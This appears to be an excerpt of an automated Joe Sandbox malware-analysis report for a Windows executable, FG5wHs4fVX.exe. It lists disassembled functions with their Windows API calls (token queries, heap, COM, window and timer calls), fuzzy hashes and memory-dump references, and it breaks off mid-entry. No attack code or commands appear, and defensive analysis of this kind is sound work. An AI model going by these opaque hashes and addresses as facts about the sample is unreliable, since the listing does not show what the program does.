Opcode ID: 5e91dc08381e668dd710e1160cb1202072efbc8efecad824fed6d9c735918d9e
Instruction ID: edd2dff25d9dab055b361c9175db209de6aade8d7a229c80375a182aa862b74e
Opcode Fuzzy Hash: 5e91dc08381e668dd710e1160cb1202072efbc8efecad824fed6d9c735918d9e
Instruction Fuzzy Hash: 0F01B9A1681619FBD21866209D46FBB735D9F21394F40402CFE049A641FB6EFDD1C3B4

Function 00792DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0078F2DE,00793863,00831444,?,0077FDF5,?,?,0076A976,00000010,00831440,007613FC,?,007613C6), ref: 00792DFD
_free.LIBCMT ref: 00792E32
_free.LIBCMT ref: 00792E59
SetLastError.KERNEL32(00000000,00761129), ref: 00792E66
SetLastError.KERNEL32(00000000,00761129), ref: 00792E6F

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2d4780eb1f79f5ff86bb0a845ca03b1fb18e0657b2901bc6b97d37c6e796dbb5
Instruction ID: bc37b1b87b8b4819201f1c0b0d3087f080a9439d36350ff8d4da4cd5f608f4b7
Opcode Fuzzy Hash: 2d4780eb1f79f5ff86bb0a845ca03b1fb18e0657b2901bc6b97d37c6e796dbb5
Instruction Fuzzy Hash: 9F01A932645A00B7CE1377747CCED3B265DBFD17B5B254125F425E2293EA6C8C034565

Function 007C000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,007BFF41,80070057,?,?,?,007C035E), ref: 007C002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007BFF41,80070057,?,?), ref: 007C0046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007BFF41,80070057,?,?), ref: 007C0054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007BFF41,80070057,?), ref: 007C0064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007BFF41,80070057,?,?), ref: 007C0070

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: cbc4ae49620b4d6423de36e2e31e83dab7b5761b6ee4f9fc1c98101c7dc92d30
Instruction ID: 21c9e21213ef3979f7b1c249bd28b41f4d1936e400a63dfa70755ba2a1450c6c
Opcode Fuzzy Hash: cbc4ae49620b4d6423de36e2e31e83dab7b5761b6ee4f9fc1c98101c7dc92d30
Instruction Fuzzy Hash: 53017876600208EFDB124F68DD08FBA7BADEB447A2F15812CF905D6210E779DD809BE0

Function 007CE97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 007CE997
QueryPerformanceFrequency.KERNEL32(?), ref: 007CE9A5
Sleep.KERNEL32(00000000), ref: 007CE9AD
QueryPerformanceCounter.KERNEL32(?), ref: 007CE9B7
Sleep.KERNEL32 ref: 007CE9F3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 5fea4e9a4f3c028fe0ddefd69e25833a48198c7884f59cc7e080ebd526127c83
Instruction ID: ff139f9d399fb6361d7cf3be9021ef47eabb7435631bb191693344a5054f8e15
Opcode Fuzzy Hash: 5fea4e9a4f3c028fe0ddefd69e25833a48198c7884f59cc7e080ebd526127c83
Instruction Fuzzy Hash: 99015771C0162DDBCF00ABE4D949AEDBB78FF09300F00454AE502B2241DB38A651CBA6

Function 007C10F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C1114
GetLastError.KERNEL32(?,00000000,00000000,?,?,007C0B9B,?,?,?), ref: 007C1120
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007C0B9B,?,?,?), ref: 007C112F
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007C0B9B,?,?,?), ref: 007C1136
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C114D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 9d9329a0ff811124cc002bebf8d6040cde77241c38f13c54c2999b548415fd8a
Instruction ID: c142b13f6f651a3212ce075e496cdc21afabb6a244111418709a3adabf6e6617
Opcode Fuzzy Hash: 9d9329a0ff811124cc002bebf8d6040cde77241c38f13c54c2999b548415fd8a
Instruction Fuzzy Hash: 2D018175100609BFDB125FA8DD49E6A3F6EEF863A0B144428FA41C3350DB39DC10DA60

Function 007C0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C1002

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8190e5771915135f09d342033fb5f8a4013ed91d978dd78d610aa35c7527ae3c
Instruction ID: 4496d82d8b60a80330e29ffca9b66bf20c66b44393af3672de1225d940afaf48
Opcode Fuzzy Hash: 8190e5771915135f09d342033fb5f8a4013ed91d978dd78d610aa35c7527ae3c
Instruction Fuzzy Hash: A9F06275200309EBD7224FA4DD4EF663B6DEF8A761F518429F945C7251CA78DC90CA60

Function 007C1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C1062

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: a7481af3487f1f938d40ba383c09d52a28138669e79b8147bcfa53976e0da3bd
Instruction ID: 259518f1447189d32b0a58aa5ea8185b509b13cd5e196c80b6db3fb2b637a281
Opcode Fuzzy Hash: a7481af3487f1f938d40ba383c09d52a28138669e79b8147bcfa53976e0da3bd
Instruction Fuzzy Hash: 02F0CD75200309EBDB221FA4ED4AF663BADEF8A761F104428FE05C7251CA38DC90CA60

Function 007D030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,007D017D,?,007D32FC,?,00000001,007A2592,?), ref: 007D0324
CloseHandle.KERNEL32(?,?,?,?,007D017D,?,007D32FC,?,00000001,007A2592,?), ref: 007D0331
CloseHandle.KERNEL32(?,?,?,?,007D017D,?,007D32FC,?,00000001,007A2592,?), ref: 007D033E
CloseHandle.KERNEL32(?,?,?,?,007D017D,?,007D32FC,?,00000001,007A2592,?), ref: 007D034B
CloseHandle.KERNEL32(?,?,?,?,007D017D,?,007D32FC,?,00000001,007A2592,?), ref: 007D0358
CloseHandle.KERNEL32(?,?,?,?,007D017D,?,007D32FC,?,00000001,007A2592,?), ref: 007D0365

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0c898bf3eecce2a35a6215ea55e43eee12e67abf87ad4aa7256ec69f5f27ea5d
Instruction ID: d5cffe5edbb17e157c578d8add14ed9cd93e12b7e7ee471cb977aca2b7f1ec17
Opcode Fuzzy Hash: 0c898bf3eecce2a35a6215ea55e43eee12e67abf87ad4aa7256ec69f5f27ea5d
Instruction Fuzzy Hash: 2801AA72800B55DFCB30AF66D880916FBF9BF603153159A3FD19652A31C3B5A998DF80

Function 0079D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0079D752

Part of subcall function 007929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000), ref: 007929DE
Part of subcall function 007929C8: GetLastError.KERNEL32(00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000,00000000), ref: 007929F0

_free.LIBCMT ref: 0079D764
_free.LIBCMT ref: 0079D776
_free.LIBCMT ref: 0079D788
_free.LIBCMT ref: 0079D79A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ccab28681c84a50da956dee6956cd6d6ec56604de3d0655aad1d3e04b97eab28
Instruction ID: cd8ed432036f8ae628c8a64eb8c16660efd7a01f427daabdaa22ab9900261bb6
Opcode Fuzzy Hash: ccab28681c84a50da956dee6956cd6d6ec56604de3d0655aad1d3e04b97eab28
Instruction Fuzzy Hash: DFF01232544204BB8E31FBA4F9C5C2A7BDDBB447207E44805F04CE7552C738FC818AA4

Function 007C5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 007C5C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 007C5C6F
MessageBeep.USER32(00000000), ref: 007C5C87
KillTimer.USER32(?,0000040A), ref: 007C5CA3
EndDialog.USER32(?,00000001), ref: 007C5CBD

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: acdc19dc9b0bec20b14eb7143c548af93558cd8f9c18c9a8d144e229b66f036d
Instruction ID: 5c32af55039fb816cd31750b8e0f99eb8b708aacfe9757ad54ed5256d34b1ac2
Opcode Fuzzy Hash: acdc19dc9b0bec20b14eb7143c548af93558cd8f9c18c9a8d144e229b66f036d
Instruction Fuzzy Hash: 8B018130500B09ABEB315B10DE4EFA67BB8BF00B05F00555DA593A10E1DBF9B988CBA4

Function 007922A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007922BE

Part of subcall function 007929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000), ref: 007929DE
Part of subcall function 007929C8: GetLastError.KERNEL32(00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000,00000000), ref: 007929F0

_free.LIBCMT ref: 007922D0
_free.LIBCMT ref: 007922E3
_free.LIBCMT ref: 007922F4
_free.LIBCMT ref: 00792305

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 32342c2a705324e4edd287fb992d42ba60e3920ee4dcc42af0217d6990909654
Instruction ID: f4501d96d3571a03e620847c0c5bb285722018dc726c265cace27f51d18c76f6
Opcode Fuzzy Hash: 32342c2a705324e4edd287fb992d42ba60e3920ee4dcc42af0217d6990909654
Instruction Fuzzy Hash: 54F05E70800520EB8E22FF54BC0981D3B64F758B60741491AF818E22B6CB381953EFE4

Function 007795C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 007795D4
StrokeAndFillPath.GDI32(?,?,007B71F7,00000000,?,?,?), ref: 007795F0
SelectObject.GDI32(?,00000000), ref: 00779603
DeleteObject.GDI32 ref: 00779616
StrokePath.GDI32(?), ref: 00779631

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: c00b8cf51e3ba92f3ac38d9cb8eff5e931721f19b137609be7b2798af9880878
Instruction ID: ad0f549ec0ca4dea27010495bd85dd6f5f41911bde6ee3383aace8a3a1024e39
Opcode Fuzzy Hash: c00b8cf51e3ba92f3ac38d9cb8eff5e931721f19b137609be7b2798af9880878
Instruction Fuzzy Hash: FBF0F634006608EBDF129F65EE1CBA43F61BB81772F44C214E969950F0DB3889A6DF24

Function 00790F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 007910F9
__freea.LIBCMT ref: 00791117

Part of subcall function 00791537: _free.LIBCMT ref: 0079154F

Strings

am/pm, xrefs: 0079117A
a/p, xrefs: 007911DE

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 38b9d40950922e3416ab416fb4231f9cc854d7ac2ca5ede8334a432fdd03baf6
Instruction ID: d10045fcd6834649c997ff6e1f6378f5a77a287420818925af9726d0e89eded6
Opcode Fuzzy Hash: 38b9d40950922e3416ab416fb4231f9cc854d7ac2ca5ede8334a432fdd03baf6
Instruction Fuzzy Hash: EED13631A00207DADF299F68E895BFEB7B1FF06300FA44159E911AB650D37D9DA0CB91

Function 00798A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00798B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00798B7A
__dosmaperr.LIBCMT ref: 00798B81

Strings

.x, xrefs: 00798A63

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .x
API String ID: 2434981716-4151879616
Opcode ID: 25dfead573ef97e5e71ef9c7457836497c4635587c498da11c8373c8ad3c08a3
Instruction ID: 99b027fe80d60cf987137d0e195b37c6f1e72397af8f92f2ec4e0a01b2df9e62
Opcode Fuzzy Hash: 25dfead573ef97e5e71ef9c7457836497c4635587c498da11c8373c8ad3c08a3
Instruction Fuzzy Hash: A8418CF0604145AFDF659F24E894A7D7FE5EB87300F2C85AAF49587242DE398C02D792

Function 0079172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\FG5wHs4fVX.exe,00000104), ref: 00791769
_free.LIBCMT ref: 00791834
_free.LIBCMT ref: 0079183E

Strings

C:\Users\user\Desktop\FG5wHs4fVX.exe, xrefs: 00791760, 00791767, 00791796, 007917CE

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\FG5wHs4fVX.exe
API String ID: 2506810119-192713746
Opcode ID: 8b0ce889d1ac1168952bc02a526dbc3c463274888db6291285514af9ddf0599a
Instruction ID: f5b8429627ac3b2cd029f8147eec2c8687d2d3114b70d524bb752963a5d9ae62
Opcode Fuzzy Hash: 8b0ce889d1ac1168952bc02a526dbc3c463274888db6291285514af9ddf0599a
Instruction Fuzzy Hash: 3931B371A0020AEFDF21DF99E889D9EBBFCFB85720B504166F804D7211D6744E50DB90

Function 007CC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007CC306
DeleteMenu.USER32(?,00000007,00000000), ref: 007CC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00831990,01215798), ref: 007CC395

Strings

0, xrefs: 007CC2DF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 6f8d14a1ea886233c574440b58124f7e2c92681fcffd2e6244ea01dae182b8f1
Instruction ID: 98a356588c2c785a0c02c96e7b946f857e74be85fc80e6bc7be6099fc5a83601
Opcode Fuzzy Hash: 6f8d14a1ea886233c574440b58124f7e2c92681fcffd2e6244ea01dae182b8f1
Instruction Fuzzy Hash: FE419F71204341DFD721DF25E845F2ABBE8AB85310F10861DF9A997291D738E904CB62

Function 007F4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,007FCC08,00000000,?,?,?,?), ref: 007F44AA
GetWindowLongW.USER32 ref: 007F44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007F44D7

Strings

SysTreeView32, xrefs: 007F447C

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: ab2e816cf583d67d428caacafa4cbca2579f33607419cc3aaeaf2b1da2312e11
Instruction ID: 8928c9a8ba2a940f16961e3bea2e04937214c80bceb5c47115d6715b88be000c
Opcode Fuzzy Hash: ab2e816cf583d67d428caacafa4cbca2579f33607419cc3aaeaf2b1da2312e11
Instruction Fuzzy Hash: F7316C71214249ABDB219E38DC45BFB77A9EB08324F208715FA79A22D0D778E8609B50

Function 007C6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 007C6EED
VariantCopyInd.OLEAUT32(?,?), ref: 007C6F08
VariantClear.OLEAUT32(?), ref: 007C6F12

Strings

*j|, xrefs: 007C6E8B, 007C6E90, 007C6EF8

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

